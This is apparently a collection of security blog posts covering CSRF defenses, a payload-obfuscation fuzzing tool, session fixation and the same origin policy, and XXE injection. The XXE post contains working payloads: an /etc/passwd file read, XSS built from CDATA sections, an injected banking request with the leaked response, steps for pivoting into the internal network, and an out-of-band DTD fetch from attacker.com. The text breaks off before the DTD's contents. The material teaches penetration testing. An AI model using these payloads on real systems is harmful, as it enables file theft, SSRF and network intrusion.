This might be seen as a useful CSRF prevention technique, as the attacker cannot guess the victim's session ID. However, the user's credential is exposed in the URL.

CSRF countermeasures

CSRF attacks are very hard to trace and are probably not traceable unless one or more of the following conditions are met:

Detailed Web Application user auditing exists and is enabled.
Concurrent logins are not allowed (allowing concurrent logins would remove non-repudiation).
The Web Application binds the Web Application session to the user IP (that way, if the user is behind a NAT, only users from the same intranet would be able to perform a CSRF attack).
AntiCSRF tokens are used per Web Application function. In order to be effective, an AntiCSRF token would have to be:

Truly random.
Bound to every Web Application function (different per Web Application function).
Session-like in behavior (e.g. expire after a certain time).
Backed by two-factor authentication per token (e.g. make use of an RSA token to generate the AntiCSRF token to perform a transaction).
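The first three token properties listed above (random, bound to a function, expiring) can be sketched in a few lines of Python. This is only an illustration under my own assumptions: SERVER_KEY, the token layout and the function names are hypothetical, and the two-factor part is left out completely.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # hypothetical per-deployment secret


def _sign(session_id, function_name, issued, nonce):
    message = "{}|{}|{}|{}".format(session_id, function_name, issued, nonce)
    return hmac.new(SERVER_KEY, message.encode(), hashlib.sha256).hexdigest()


def issue_token(session_id, function_name, now=None):
    """Create a token bound to one session and one application function."""
    issued = int(time.time() if now is None else now)
    nonce = secrets.token_hex(16)  # unpredictable part of the token
    return "{}.{}.{}".format(issued, nonce,
                             _sign(session_id, function_name, issued, nonce))


def verify_token(token, session_id, function_name, max_age=900, now=None):
    """Accept the token only for the same session and function, before expiry."""
    try:
        issued_text, nonce, mac = token.split(".")
        issued = int(issued_text)
    except ValueError:
        return False
    current = time.time() if now is None else now
    if current - issued > max_age:
        return False  # the token expired, like a session would
    expected = _sign(session_id, function_name, issued, nonce)
    return hmac.compare_digest(mac.encode(), expected.encode())
```

A token issued for the "transfer" function is rejected when replayed against "change_password", which is the per-function binding described in the list.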

Other technologies for protecting against CSRF

In the web there are numerous references regarding the implementation of anti-CSRF tokens. Some examples can be found here:

Using View State to prevent CSRF attacks (example here)
OWASP CSRFGuard Project for Java
PHP CSRF Guard
.Net CSRF Guard
Anti CSRF for Joomla!

The mentality promoted by the above technologies is obvious: we should deploy a mechanism that makes every session initiated by the user unique. This can be achieved by sending the browser an anti-CSRF token that is appended to every request the browser sends to the server. This technique is explained in more technical terms in OWASP's CSRF Prevention cheat sheet:

"These challenge tokens are the inserted within the HTML forms and links associated with sensitive server-side operations. When the user wishes to invoke these sensitive operations, the HTTP request should include this challenge token. It is then the responsibility of the server application to verify the existence and correctness of this token. By including a challenge token with each request, the developer has a strong control to verify that the user actually intended to submit the desired requests. Inclusion of a required security token in HTTP requests associated with sensitive business functions helps mitigate CSRF attacks as successful exploitation assumes the attacker knows the randomly generated token for the target victim's session. This is analogous to the attacker being able to guess the target victim's session identifier."

Epilogue

This blog post attempted to cover the subject of CSRF thoroughly, and I believe that I managed to do that. There is obviously a lot more to say about how to protect against CSRF, but that is out of scope for this post. Merry Christmas and a Happy New Year.

22/08/2012

The Teenage Mutant Ninja Turtles project....

Intro

Elusive Thoughts are proud to present you The Teenage Mutant Ninja Turtles project....

What is Teenage Mutant Ninja Turtles?

The Teenage Mutant Ninja Turtles project is three things:

A Web Application payload database (heavily based on fuzzdb project for now).
A Web Application error database.
A Web Application payload mutator.

Nowadays all high-profile sites in the financial and telecommunication sectors use filters to block all types of injection attacks, such as SQL Injection, XSS, XXE, HTTP Header Injection etc. In this project I am going to provide you with a tool that generates obfuscated fuzzing injection attacks in order to bypass badly implemented Web Application injection filters (e.g. filters for SQL Injections, XSS Injections etc.).

When you test a Web Application all you need is a fuzzer and ammunition:

"I saw clearly that war was upon us when I learned that my young men had been secretly buying ammunition."

Chief Joseph

Ammunition is what you use for fuzzing and the weapon is the fuzzer itself. The project called teenage-mutant-ninja-turtles is an open source payload mutator, nothing more, nothing less. With teenage-mutant-ninja-turtles you will be able to generate obfuscated payloads for testing all sorts of attacks, such as XSS, SQL Injections etc. The project is in version 1.1 and currently supports only SQL Injection fuzzing. Later on I will add support for fuzzdb and all types of attacks. Maybe later it will become a complete Web Application Scanner, who knows. If you are interested, please contact me to participate.

Download link: http://code.google.com/p/teenage-mutant-ninja-turtles/downloads/list

The Teenage Mutant Ninja Turtles in action

The following screenshot shows the tool banner (yes it has a banner!!):

The Teenage Mutant Ninja Turtles project is a Web Application payload database for performing black box Web Application penetration tests (it also supports banner displaying!!!). More specifically, it is:

A collection of known attack patterns focused on Web Application input validation attacks (e.g. SQL Injections, XSS attacks etc.).
A collection of error messages produced by malicious and malformed user inputs, which you can use with Burp Intruder or other grep-like utilities to identify and verify vulnerabilities when fuzzing.
An easy to use Python script that helps you obfuscate payloads for bypassing custom Web Application filters.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing, as well as being a useful addition to an experienced pen tester's toolkit.

The Teenage Mutant Ninja Turtles features

Currently Teenage Mutant Ninja Turtles (tmnt) supports the following features:

Generic payload URL encoding.
Generic payload Base64 encoding.
SQL keyword case variation (e.g. converts SELECT to SeLeCt etc.).
Generic payload de-duplication (e.g. removing duplicate payload lines).
SQL Injection prefix adder (e.g. adding EXEC to the beginning of the payload etc.).
SQL Injection postfix adder (e.g. adding ); -- to the end of the payload etc.).
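To give a feeling of what these mutations do, here is a small stand-alone Python sketch. It is not the tmnt source code; the function names and the short keyword list are my own assumptions, written only to illustrate each feature in the list above.

```python
import base64
import re
import urllib.parse

SQL_KEYWORDS = ("SELECT", "UNION", "FROM", "WHERE", "AND", "OR")  # illustrative subset


def url_encode(payload):
    """Percent-encode every character that is not unreserved."""
    return urllib.parse.quote(payload, safe="")


def base64_encode(payload):
    return base64.b64encode(payload.encode("utf-8")).decode("ascii")


def vary_keyword_case(payload):
    """Alternate upper and lower case inside known SQL keywords."""
    def alternate(match):
        word = match.group(0)
        return "".join(c.upper() if i % 2 == 0 else c.lower()
                       for i, c in enumerate(word))
    pattern = r"\b(" + "|".join(SQL_KEYWORDS) + r")\b"
    return re.sub(pattern, alternate, payload, flags=re.IGNORECASE)


def deduplicate(payloads):
    """Drop repeated payload lines while keeping the first-seen order."""
    return list(dict.fromkeys(payloads))


def add_prefix(payload, prefix="EXEC "):
    return prefix + payload


def add_postfix(payload, postfix="); --"):
    return payload + postfix


if __name__ == "__main__":
    for line in deduplicate(["' OR 1=1", "SELECT name FROM users", "' OR 1=1"]):
        print(vary_keyword_case(line), "|", url_encode(line), "|", base64_encode(line))
```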

The following screenshot shows the help message of the tool:

Epilogue

There are more features to come...

25/06/2012

Going The Same Way?

Intro

This article explains the impact of the Session Fixation and Session Hijacking vulnerabilities and also does a post-exploitation analysis of the methodologies used by organized crime. Many people, and by many people I mean Information Security Consultants, Security System administrators and Penetration testers, tend to believe that Session Fixation/Hijacking is not a serious problem. When they find it in a Web Application they report it as low risk, or they believe that as long as the session is not passed in the URL, session fixation cannot be used efficiently to attack the website.

Well, that is wrong, and I am sure about it because I have seen lots of my clients become victims of organized crime. I am also reminding you that if:

You become a Cross-Site Scripting victim, it might be difficult to detect the attack (especially if you allow concurrent logins).
You have a Session Hijacking event, it is not traceable; and for the session hijacking to be successful, you have to allow concurrent logins.

Well, how do you protect against session fixation? That is easy to answer: with a properly configured server same origin policy and by not allowing concurrent logins (it is implied that you have to use random values per page, refresh the cookie after successful login and generate truly random, or pseudo-random but not predictable, cookies). You should also perform web user auditing and, if possible, feed the web user logs to an IDS/IPS device or a web application firewall. Most IPS/IDS devices and Web Application firewalls can understand a syslog-like input, and your web or system administrator can probably set that up.
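Two of the measures above (refreshing the cookie after login and not allowing concurrent logins) are easy to show in code. The following is a minimal in-memory sketch, assuming a hypothetical SessionStore class of my own; a real application would rely on its framework's session handling.

```python
import secrets


class SessionStore:
    """In-memory session table that allows one live session per user."""

    def __init__(self):
        self._by_id = {}    # session id -> user name (None before login)
        self._by_user = {}  # user name -> current session id

    def new_anonymous_session(self):
        session_id = secrets.token_urlsafe(32)  # unpredictable identifier
        self._by_id[session_id] = None
        return session_id

    def login(self, old_session_id, user):
        """Discard the pre-login id and any earlier login, then issue a new id."""
        self._by_id.pop(old_session_id, None)     # a fixated id dies here
        previous = self._by_user.pop(user, None)  # no concurrent logins
        if previous is not None:
            self._by_id.pop(previous, None)
        session_id = secrets.token_urlsafe(32)
        self._by_id[session_id] = user
        self._by_user[user] = session_id
        return session_id

    def user_for(self, session_id):
        """Return the logged-in user for this id, or None."""
        return self._by_id.get(session_id)
```

Because the identifier handed out before login is never promoted to an authenticated session, an attacker who planted it in the victim's browser gains nothing after the victim logs in.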

The XSS/Phishing Proxy Attack

When a Web Application is vulnerable to a) a Session fixation attack (e.g. predictable cookie generation or no cookie refresh after login) or b) a Session Stealing attack (e.g. XSS attack or Script Injection Attack etc.), the following conceptual attack scenarios are all feasible. See the following diagram:

In the diagram above you can see that initially the attacker sends an e-mail that hides one of the following: a link that forms a GET request when opened in the browser, a hidden HTML form (or a JavaScript/VBScript) that forms a POST request when opened in the browser, or a link that redirects the victim to the fake proxy site. These types of attacks are already implemented in the Social Engineering Toolkit (SET) and you can have a look if you want. The attacker can form a POST/GET request to forward the predicted/fixed or stolen session ID, or can use a phishing site to alter the GET request sent by the victim to a POST request with a valid session.

Then if you use a single session of authentication:

If the session is predictable, the attacker can hijack multiple users' sessions.
If the session is stolen, but not predictable and refreshed, the attacker can hijack a single user.
If the session is not stolen, not predictable and not refreshed, the attacker can hijack multiple users.

The Same origin policy

The Same Origin Policy permits scripts running on pages originating from the same site to access each other's methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites.

This mechanism bears a particular significance for modern web applications that extensively depend on HTTP cookies to maintain authenticated user sessions, as servers act based on the HTTP cookie information to reveal sensitive information or take state-changing actions. A strict separation between content provided by unrelated sites must be maintained on the client side to prevent the loss of data confidentiality or integrity.

History

The concept of same origin policy dates back to Netscape Navigator 2.0. Close derivatives of the original design are used in all current browsers and are often extended to define roughly compatible security boundaries for other web scripting languages, such as Adobe Flash, or for mechanisms other than direct DOM manipulation, such as XMLHttpRequest.

Origin determination rules

The term "origin" is defined using the domain name, application layer protocol, and (in most browsers) port number of the HTML document running the script. Two resources are considered to be of the same origin if and only if all these values are exactly the same. To illustrate, the following table gives an overview of typical outcomes for checks against the URL "http://www.example.com/dir/page.html".
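The origin comparison described above can be sketched in Python as follows. This is only an approximation of what browsers do: the function names are mine, and treating a missing port as the scheme's default port (80 or 443) is an assumption, since historically browsers did not all agree on that case.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}  # assumed defaults for a missing port


def origin(url):
    """Return the (protocol, host, port) triple that defines an origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)


def same_origin(url_a, url_b):
    return origin(url_a) == origin(url_b)


if __name__ == "__main__":
    base = "http://www.example.com/dir/page.html"
    for other in ("http://www.example.com/dir2/other.html",
                  "http://www.example.com:81/dir/other.html",
                  "https://www.example.com/dir/other.html",
                  "http://en.example.com/dir/other.html"):
        print(other, "->", same_origin(base, other))
```

Only the first URL in the usage example shares all three values with the base URL; the others differ in port, protocol or host name.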

Same-origin policy for DOM access

With no additional qualifiers, the term "same-origin policy" most commonly refers to a mechanism that governs the ability for JavaScript and other scripting languages to access DOM properties and methods across domains (reference). In essence, the model boils down to this three-step decision process:

If protocol, host name, and - for browsers other than Microsoft Internet Explorer - port number for two interacting pages match, access is granted with no further checks.
Any page may set document.domain parameter to a right-hand, fully-qualified fragment of its current host name (e.g., foo.bar.example.com may set it to example.com, but not ample.com). If two pages explicitly and mutually set their respective document.domain parameters to the same value, and the remaining same-origin checks are satisfied, access is granted.
If neither of the above conditions is satisfied, access is denied.
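The three-step decision process above can be written down as a short Python sketch. It is a simplified model, not browser code: pages are plain dictionaries, the key names are hypothetical, and I assume that the "remaining same-origin checks" in step two boil down to a matching protocol.

```python
def can_set_document_domain(host, value):
    """True if value is the host itself or a right-hand, dot-aligned fragment."""
    host, value = host.lower(), value.lower()
    return host == value or host.endswith("." + value)


def dom_access_allowed(page_a, page_b):
    """Pages are dicts with 'scheme', 'host', 'port', optional 'document_domain'."""
    # Step 1: protocol, host name and port all match.
    if ((page_a["scheme"], page_a["host"], page_a["port"]) ==
            (page_b["scheme"], page_b["host"], page_b["port"])):
        return True
    # Step 2: both pages explicitly set document.domain to the same value
    # (assumption: the remaining check is the protocol).
    domain_a = page_a.get("document_domain")
    domain_b = page_b.get("document_domain")
    if domain_a and domain_a == domain_b:
        return page_a["scheme"] == page_b["scheme"]
    # Step 3: otherwise access is denied.
    return False


if __name__ == "__main__":
    www = {"scheme": "http", "host": "www.example.com", "port": 80,
           "document_domain": "example.com"}
    payments = {"scheme": "http", "host": "payments.example.com", "port": 80,
                "document_domain": "example.com"}
    print(can_set_document_domain("foo.bar.example.com", "example.com"))
    print(can_set_document_domain("foo.bar.example.com", "ample.com"))
    print(dom_access_allowed(www, payments))
```

Note that any third subdomain that sets the same document_domain value passes step two as well.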

In theory, the model seems simple and robust enough to ensure proper separation between unrelated pages, and serve as a method for sand-boxing potentially untrusted or risky content within a particular domain; upon closer inspection, quite a few drawbacks arise, however:

Firstly, the document.domain mechanism functions as a security tarpit: once any two legitimate subdomains in example.com, e.g. www.example.com and payments.example.com, choose to cooperate this way, any other resource in that domain, such as user-pages.example.com, may then set its own document.domain likewise, and arbitrarily mess with payments.example.com. This means that in many scenarios, document.domain may not be used safely at all.
Whenever document.domain cannot be used - either because pages live in completely different domains, or because of the aforementioned security problem - legitimate client-side communication between, for example, embeddable page gadgets, is completely forbidden in theory, and in practice very difficult to arrange, requiring developers to resort to the abuse of known browser bugs, or to latency-expensive server-side channels, in order to build legitimate web applications.
Whenever tight integration of services within a single host name is pursued to overcome these communication problems, because of the inflexibility of same-origin checks, there is no usable method to sandbox any untrusted or particularly vulnerable content to minimize the impact of security problems.

On top of this, the specification is simplistic enough to actually omit quite a few corner cases; among other things:

The document.domain behavior when hosts are addressed by IP addresses, as opposed to fully-qualified domain names, is not specified.
The document.domain behavior with extremely vague specifications (e.g., com or co.uk) is not specified.
The algorithms of context inheritance for pseudo-protocol windows, such as about:blank, are not specified.
The behavior for URLs that do not meaningfully have a host name associated with them (e.g., file://) is not defined, causing some browsers to permit locally saved files to access every document on the disk or on the web; users are generally not aware of this risk, potentially exposing themselves.
The behavior when a single name resolves to vastly different IP addresses (for example, one on an internal network, and another on the Internet) is not specified, permitting DNS rebinding attacks and related tricks that put certain mechanisms (captchas, ad click tracking, etc) at extra risk.
Many one-off exceptions to the model were historically made to permit certain types of desirable interaction, such as the ability to point own frames or script-spawned windows to new locations - and these are not well-documented.

All this ambiguity leads to a significant degree of variation between browsers, and historically, resulted in a large number of browser security flaws. A detailed analysis of DOM actions permitted across domains, as well as context inheritance rules, is given in later sections. A quick survey of several core same-origin differences between browsers is given below:

Note: Firefox 3 is currently the only browser that uses a directory-based scoping scheme for same-origin access within file://. This bears some risk of breaking quirky local applications, and may not offer protection for shared download directories, but is a sensible approach otherwise.

Corner cases and exceptions

The behavior of same-origin checks and related mechanisms is not well-defined in a number of corner cases, such as for protocols that do not have a clearly defined host name or port associated with their URLs (file:, data:, etc.). This historically caused a fair number of security problems, such as the generally undesirable ability of any locally stored HTML file to access all other files on the disk, or communicate with any site on the Internet.

In addition, many legacy cross-domain operations predating JavaScript are not subjected to same-origin checks; one such example is the ability to include scripts across domains, or submit POST forms. Lastly, certain types of attacks, such as DNS rebinding or server-side proxies, permit the host name check to be partly subverted, and make it possible for rogue web pages to directly interact with sites through addresses other than their "true", canonical origin. The impact of such attacks is limited to very specific scenarios, since the browser still believes that it is interacting with the attacker's site, and therefore does not disclose third-party cookies or other sensitive information to the attacker.

Workarounds

To enable developers to circumvent the same origin policy in a controlled manner, a number of "hacks", such as using the fragment identifier or the window.name property, have been used to pass data between documents residing in different domains. With the HTML5 standard, a method was formalized for this: the postMessage interface, which is only available on recent browsers. JSONP and cross-origin resource sharing can also be used to enable Ajax-like calls to other domains. easyXDM can also be used to work around the limitation set in place by the Same Origin Policy. It is a lightweight, easy to use and self-contained JavaScript library that makes it easy for developers to communicate and expose JavaScript APIs across domain boundaries.

14/03/2012

Infiltrating corporate networks using XXE injection

XML External Entity (XXE) Injection — Updated 2026

DTD Abuse // File Disclosure // Blind OOB Exfiltration // SSRF via XML

Intro

External entity injection is, generally speaking, a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. This type of attack is well documented and has been known since 2002, yet it continues to appear in modern applications, particularly in SOAP services, file upload handlers, and legacy enterprise integrations.

Taxonomy (2026): XXE was categorized as OWASP A4:2017 — XXE (its own dedicated category). In OWASP Top 10 2021, it was merged into A5:2021 — Security Misconfiguration. The primary CWE is CWE-611 (Improper Restriction of XML External Entity Reference). Also relevant: CWE-827 (Improper Control of Document Type Definition).

XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections — allowing embedding of data outside the main file into an XML document. A successful XXE injection attack could allow an attacker to access operating system files, cause a DoS attack, perform SSRF, or in certain conditions inject JavaScript (performing an XSS attack).

How the XML parser works

Based on W3C Recommendation — Extensible Markup Language (XML) 1.0, Fifth Edition

When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.

This rule is based on the recognition that the automatic inclusion provided by the SGML and XML entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.

When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.

How the XML parser handles XXEs

An XXE is meant to be converted to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article, or a processing instruction defined by a particular application specification, relative URIs are relative to the location of the resource within which the entity declaration occurs.

This is defined to be the external entity containing the < which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).

Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.

In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.

Figure 1 — XXE attack flow: from malicious DTD to data exfiltration

An actual example of XXE

Based on what is already explained about how the XML parser handles XXE, in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<PutMeHere>&xxe;</PutMeHere>

See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser, the passwd file contents will be loaded and returned.

Note: The XML document is not valid if the &xxe; reference does not start with the & character and terminate with the ; character. The attack is limited to files containing text that the XML parser will allow at the place where the external entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.
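The expansion mechanism itself can be observed safely with an internal entity, which needs no file access at all. The sketch below uses Python's standard xml.etree.ElementTree; the entity name demo and its replacement text are made up for the illustration. As far as I know, ElementTree does not fetch external entities such as the /etc/passwd one above, which is why an internal entity is used as a stand-in here.

```python
import xml.etree.ElementTree as ET

# Same structure as the example above, but the entity is internal:
# its replacement text lives in the DTD instead of in an external file.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY demo "replacement text from the DTD">
]>
<PutMeHere>&demo;</PutMeHere>"""

root = ET.fromstring(DOCUMENT)
# The parser substitutes the entity reference before the application sees it.
print(root.tag, "->", root.text)
```

A parser that resolves external entities performs the same substitution, only with the contents of the referenced resource.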

Identifying XXE attack strings

The following table contains attack strings that can help someone break the XML schema and cause the XML parser to return possibly verbose errors, helping you identify the XML structures.

#	Payload	Purpose
1	'	Single quote — break attribute values
2	''	Double single quote
3	"	Double quote — break attribute values
4	""	Double double quote
5	<	Open tag — trigger parser error
6	>	Close tag
7	]]>	CDATA end — premature closure
8	]]>>	Malformed CDATA end
9	<!--/-->	Malformed comment
10	/-->	Partial comment close
11	-->	Comment close without open
12	<!--	Comment open without close
13	<!	Incomplete declaration
14	<![CDATA[ / ]]>	CDATA section — bypass parsing

CDATA sections: <![CDATA[ / ]]> — CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. Characters enclosed in a CDATA section are not parsed by the XML parser.
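A quick way to see which of these strings actually break well-formedness is to feed them to a local parser before sending them anywhere. The sketch below uses Python's xml.etree.ElementTree; the TEMPLATE request body is a hypothetical stand-in for the target's message, and only a few of the strings from the table are included.

```python
import xml.etree.ElementTree as ET

TEMPLATE = "<user><username>user1{}</username></user>"  # hypothetical request body
PROBES = ["'", '"', "<", ">", "<!--", "<![CDATA[ / ]]>"]


def probe_breaks_parser(probe):
    """Return the parser error text if the probe breaks well-formedness, else None."""
    try:
        ET.fromstring(TEMPLATE.format(probe))
    except ET.ParseError as error:
        return str(error)
    return None


for probe in PROBES:
    result = probe_breaks_parser(probe)
    print(repr(probe), "->", result or "parsed without error")
```

Strings that parse cleanly here may still be useful against the target, because the server may place the value inside an attribute or build its XML by string concatenation.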

Exploiting XXE vulnerabilities

Let's suppose there is a web application using XML-style communication to perform user login. This is done by creating and adding a new <user> node on an XML database file. We will try to inject XML that breaks the schema. Some or all of the following attempts will generate an XML error, helping us understand the XML schema.

Valid XML request

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1</username>
  <credentials>pass1</credentials>
</user>

Example 1 — angle bracket injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<</username>
  <credentials>pass1</credentials>
</user>

Example 2 — malformed comment injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<--<</username>
  <credentials>pass1</credentials>
</user>

Example 3 — closing angle bracket

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1></username>
  <credentials>pass1</credentials>
</user>

Example 4 — comment injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<!--/--></username>
  <credentials>pass1</credentials>
</user>

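The complete comment <!--/--> shown in Example 4 is well-formed, so the parser silently discards it. Injecting an opening <!-- without a matching --> after the username is different: the parser interprets everything after it as a comment, potentially consuming the closing tag and the credentials field. The resulting error message can be informative enough to reveal the schema structure.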

Example 5 — CDATA injection

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1 <![CDATA[ / ]]> </username>
  <credentials>pass1</credentials>
</user>

Example 6 — XSS via CDATA

<?xml version="1.0" encoding="ISO-8859-1"?>
<user>
  <username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]></username>
  <credentials>pass1</credentials>
</user>

When the XML document is parsed, the CDATA delimiters are eliminated, reconstructing a <script> tag. If the tag contents are reflected in an HTML page, XSS is achieved.
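The reconstruction of the tag can be checked locally with Python's xml.etree.ElementTree. The request below is Example 6 without the XML declaration; the call to html.escape is my own addition, to show what the value looks like when the application encodes it before reflecting it.

```python
import html
import xml.etree.ElementTree as ET

REQUEST = (
    "<user><username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')"
    "<![CDATA[<]]>/script<![CDATA[>]]></username>"
    "<credentials>pass1</credentials></user>"
)

username = ET.fromstring(REQUEST).findtext("username")
print(username)               # value as the application sees it after parsing
print(html.escape(username))  # HTML-encoded form of the same value
```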

A real attack scenario

XXE attacks can result in OS file read access, similar to a path traversal attack. Consider a sophisticated e-banking application that uses the browser as a thin client, consuming a web service after successful login. The transaction XML message carries the username and password back and forth alongside the transaction data.

Client request — legitimate transaction

<?xml version="1.0" encoding="ISO-8859-7"?>
<appname>
  <header>
    <principal>username1</principal>
    <credential>userpass1</credential>
  </header>
  <fixedPaymentsDebitRequest>
    <fixedPayment organizationId="44" productId="61"
      clientId="33333333" paymentId="3"
      referenceDate="2008-05-12" paymentDate="20-11-25">
      <amount currency="EUR">100,1</amount>
      <transactionId>1111111</transactionId>
      <description>customer description</description>
    </fixedPayment>
  </fixedPaymentsDebitRequest>
</appname>

Client request — with XXE injection

<?xml version="1.0" encoding="ISO-8859-7"?>
<!DOCTYPE foo [<!ENTITY xxefca0a SYSTEM "file:///etc/passwd"> ]>
<appname>
  <header>
    <principal>username1&xxefca0a;</principal>
    <credential>userpass1</credential>
  </header>
  <fixedPaymentsDebitRequest>
    ...
  </fixedPaymentsDebitRequest>
</appname>

The &xxefca0a; entity reference in the <principal> tag causes the parser to read /etc/passwd and embed its contents into the XML. The server response — whether a success or error message — will contain the file contents concatenated with the username.

Server response — file contents exfiltrated

HTTP/1.1 400 Bad Request
...error message containing...
username1root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
...
jboss:x:101:101:JBossAS:/usr/share/jbossas:/bin/sh
Server: Apache/x.x (Red Hat)
Content-Type: text/html;charset=ISO-8859-1

Figure 2 — XXE escalation: from file read to full internal network pivot

The next step after initial file exfiltration would be to map the outbound local firewall rules to see what traffic is allowed to go out. Download the /etc/hosts file of the compromised web server, then start forwarding traffic to identified internal machines. As soon as you get a response back, you know that the specific machine is actively responding. Then rotate through all ports to identify which services are accessible. This maps the egress filtering done by the application server's local firewall.
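The bookkeeping for this step can be sketched in Python: parse the retrieved hosts file, then build one candidate URI (and one XXE document) per host and port. All names here are hypothetical, the sketch assumes IPv4 entries, and it only builds strings; sending them and measuring the responses is left to whatever client you already use against the target.

```python
def parse_hosts(text):
    """Return {ip: [names]} from /etc/hosts style text, skipping comments."""
    entries = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        entries.setdefault(ip, []).extend(names)
    return entries


def candidate_uris(entries, ports, skip=("127.0.0.1", "::1")):
    """One http:// URI per remaining host and port, in a stable order."""
    return ["http://{}:{}/".format(ip, port)
            for ip in entries if ip not in skip
            for port in ports]


def xxe_document(uri, entity="probe"):
    """Wrap a URI in a document whose external entity points at it."""
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE foo [<!ENTITY {0} SYSTEM "{1}">]>\n'
            '<foo>&{0};</foo>').format(entity, uri)


if __name__ == "__main__":
    hosts = parse_hosts("127.0.0.1 localhost\n10.0.0.5 db01 db01.corp # database\n")
    for uri in candidate_uris(hosts, [80, 8080]):
        print(xxe_document(uri))
```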

After mapping the firewall rules, the next step would be to fingerprint surrounding web servers using DirBuster directory lists, or further escalate using HTTPS to fingerprint based on SSL/TLS error responses, and then deliver payloads or perform path traversal / SQL injection attacks through the XML parser.

What can you do with a successful XXE attack

Use the application as a proxy, retrieving sensitive content from any web servers the application can reach, including those on private non-routable address space.
Exploit vulnerabilities on back-end web applications, provided they can be exploited via URIs (directory brute-forcing, SQL injection, path traversal, etc.).
Test for open ports on back-end systems by cycling through IP addresses and port numbers. Timing differences can be used to infer the state of requested ports. Service banners may appear in application responses.
Map firewall rules on other company extranets.
DoS internal company web server machines (e.g. requesting /dev/random or recursive entity expansion — the "Billion Laughs" attack).
Hide port scans by mixing them with the vulnerable web server's legitimate traffic.
Access cloud metadata endpoints to steal IAM credentials (AWS, GCP, Azure).
Connect to internal services like syslog daemons, proxy admin panels, or unprotected file shares via UNC paths.
Launch blind SQL injection attacks through the parser against surrounding database servers.
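To see why recursive entity expansion works as a DoS, it helps to do the arithmetic rather than run the payload. The sketch below assumes the commonly cited form of the "Billion Laughs" document: a 3-character base entity and nine further entities, each referencing the previous one ten times. The function name expanded_size is made up for illustration.

```python
def expanded_size(levels: int, fanout: int, base_len: int) -> int:
    """Characters produced when the top-level entity is fully expanded.

    Each of the `levels` nested entities references the one below it
    `fanout` times, so the base string is repeated fanout ** levels times.
    """
    return base_len * fanout ** levels


# Commonly cited form: "lol" (3 characters), 9 nested levels, 10 references each.
print(expanded_size(levels=9, fanout=10, base_len=3))  # 3000000000
```

A document of under a kilobyte therefore asks the parser to materialize roughly 3 GB of text, which is why disabling DTDs or capping entity expansion matters even when external entities are already blocked.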

Modern attack vectors

Blind XXE via out-of-band (OOB) exfiltration

When the application does not return the parsed entity content in its response (no direct output), blind XXE via OOB channels can still exfiltrate data. The technique uses parameter entities to load an external DTD from an attacker-controlled server, which in turn constructs a URL containing the target file's contents and forces the parser to request it.

# Malicious payload sent to the application:
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root>test</root>

# Contents of evil.dtd hosted on attacker.com:
